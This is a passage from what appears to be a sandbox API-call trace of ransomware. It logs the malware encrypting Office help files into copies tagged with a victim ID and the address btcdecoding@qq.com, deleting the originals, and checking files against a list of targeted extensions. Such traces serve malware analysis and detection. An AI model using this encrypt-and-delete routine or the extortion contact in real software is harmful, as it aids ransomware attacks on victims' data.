Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.794] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.794] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0038.794] GetLastError () returned 0x0 [0038.794] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x9339, lpOverlapped=0x0) returned 1 [0038.796] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x9340, lpOverlapped=0x0) returned 1 [0038.798] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.798] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0038.798] SetEndOfFile (hFile=0x1dc) returned 1 [0038.798] CloseHandle (hObject=0x1dc) returned 1 [0038.799] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.799] SetEndOfFile (hFile=0x17c) returned 1 [0038.800] CloseHandle (hObject=0x17c) returned 1 [0038.800] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.800] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1 [0038.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.800] lstrlenW (lpString=".doc") returned 4 [0038.800] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".docx") returned 5 [0038.801] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0038.801] lstrlenW (lpString=".pdf") returned 4 [0038.801] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".xls") returned 4 [0038.801] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".xlsx") returned 5 [0038.801] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0038.801] lstrlenW (lpString=".ppt") returned 4 [0038.801] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString=".zip") returned 4 [0038.801] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".rar") returned 4 [0038.801] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".bz2") returned 4 [0038.801] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.801] lstrlenW (lpString=".7z") returned 3 [0038.801] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString=".dbf") returned 4 [0038.801] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString=".1cd") returned 4 [0038.801] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString=".jpg") returned 4 [0038.801] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.801] lstrlenW (lpString=".doc") returned 4 [0038.801] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.801] lstrlenW (lpString=".docx") returned 5 [0038.801] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0038.802] lstrlenW (lpString=".pdf") returned 4 [0038.802] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString=".xls") returned 4 [0038.802] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString=".xlsx") returned 5 [0038.802] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0038.802] lstrlenW (lpString=".ppt") returned 4 [0038.802] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.802] lstrlenW (lpString=".zip") returned 4 [0038.802] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString=".rar") returned 4 [0038.802] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString=".bz2") returned 4 [0038.802] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.802] lstrlenW (lpString=".7z") returned 3 [0038.802] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.802] lstrlenW (lpString=".dbf") returned 4 [0038.802] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.802] lstrlenW (lpString=".1cd") returned 4 [0038.802] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0038.802] lstrlenW (lpString=".jpg") returned 4 [0038.802] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.802] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0038.802] lstrlenW (lpString="PSS10R.CHM") returned 10 [0038.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.803] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=27195) returned 1 [0038.803] CloseHandle (hObject=0x17c) returned 1 [0038.804] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20 [0038.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.805] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.805] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0038.805] GetLastError () returned 0x0 [0038.805] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0038.807] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0038.808] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.808] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0038.808] SetEndOfFile (hFile=0x1dc) returned 1 [0038.809] CloseHandle (hObject=0x1dc) returned 1 [0038.810] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.810] SetEndOfFile (hFile=0x17c) returned 1 [0038.810] CloseHandle (hObject=0x17c) returned 1 [0038.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.811] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1 [0038.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.811] lstrlenW (lpString=".doc") returned 4 [0038.811] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString=".docx") returned 5 [0038.811] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0038.811] lstrlenW (lpString=".pdf") returned 4 [0038.811] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString=".xls") returned 4 [0038.811] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString=".xlsx") returned 5 [0038.811] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0038.811] lstrlenW (lpString=".ppt") returned 4 [0038.811] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.811] lstrlenW (lpString=".zip") returned 4 [0038.811] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString=".rar") returned 4 [0038.811] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.811] lstrlenW (lpString=".bz2") returned 4 [0038.812] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.812] lstrlenW (lpString=".7z") returned 3 [0038.812] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString=".dbf") returned 4 [0038.812] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString=".1cd") returned 4 [0038.812] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString=".jpg") returned 4 [0038.812] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString=".doc") returned 4 [0038.812] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString=".docx") returned 5 [0038.812] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0038.812] lstrlenW (lpString=".pdf") returned 4 [0038.812] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString=".xls") returned 4 [0038.812] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString=".xlsx") returned 5 [0038.812] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0038.812] lstrlenW (lpString=".ppt") returned 4 [0038.812] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.812] lstrlenW (lpString=".zip") returned 4 [0038.812] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString=".rar") returned 4 [0038.812] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.812] lstrlenW (lpString=".bz2") returned 4 [0038.812] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.812] lstrlenW (lpString=".7z") returned 3 [0038.813] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.813] lstrlenW (lpString=".dbf") returned 4 [0038.813] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.813] lstrlenW (lpString=".1cd") returned 4 [0038.813] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0038.813] lstrlenW (lpString=".jpg") returned 4 [0038.813] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.813] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0038.813] lstrlenW (lpString="SETUP.CHM") returned 9 [0038.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.814] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=67190) returned 1 [0038.814] CloseHandle (hObject=0x17c) returned 1 [0038.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20 [0038.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.814] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.814] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0038.814] GetLastError () returned 0x0 [0038.814] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x10676, lpOverlapped=0x0) returned 1 [0038.817] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0038.819] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.819] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0038.819] SetEndOfFile (hFile=0x1dc) returned 1 [0038.819] CloseHandle (hObject=0x1dc) returned 1 [0038.821] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.821] SetEndOfFile (hFile=0x17c) returned 1 [0038.822] CloseHandle (hObject=0x17c) returned 1 [0038.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.822] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1 [0038.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.822] lstrlenW (lpString=".doc") returned 4 [0038.822] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.822] lstrlenW (lpString=".docx") returned 5 [0038.822] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0038.822] lstrlenW (lpString=".pdf") returned 4 [0038.822] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.822] lstrlenW (lpString=".xls") returned 4 [0038.822] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".xlsx") returned 5 [0038.823] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0038.823] lstrlenW (lpString=".ppt") returned 4 [0038.823] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString=".zip") returned 4 [0038.823] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".rar") returned 4 [0038.823] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".bz2") returned 4 [0038.823] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.823] lstrlenW (lpString=".7z") returned 3 [0038.823] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString=".dbf") returned 4 [0038.823] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString=".1cd") returned 4 [0038.823] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString=".jpg") returned 4 [0038.823] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.823] lstrlenW (lpString=".doc") returned 4 [0038.823] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".docx") returned 5 [0038.823] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0038.823] lstrlenW (lpString=".pdf") returned 4 [0038.823] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".xls") returned 4 [0038.823] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0038.823] lstrlenW (lpString=".xlsx") returned 5 [0038.823] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0038.823] lstrlenW (lpString=".ppt") returned 4 [0038.824] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0038.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.824] lstrlenW (lpString=".zip") returned 4 [0038.824] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0038.824] lstrlenW (lpString=".rar") returned 4 [0038.824] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0038.824] lstrlenW (lpString=".bz2") returned 4 [0038.824] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0038.824] lstrlenW (lpString=".7z") returned 3 [0038.824] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0038.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.824] lstrlenW (lpString=".dbf") returned 4 [0038.824] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0038.824] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.824] lstrlenW (lpString=".1cd") returned 4 [0038.824] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0038.824] 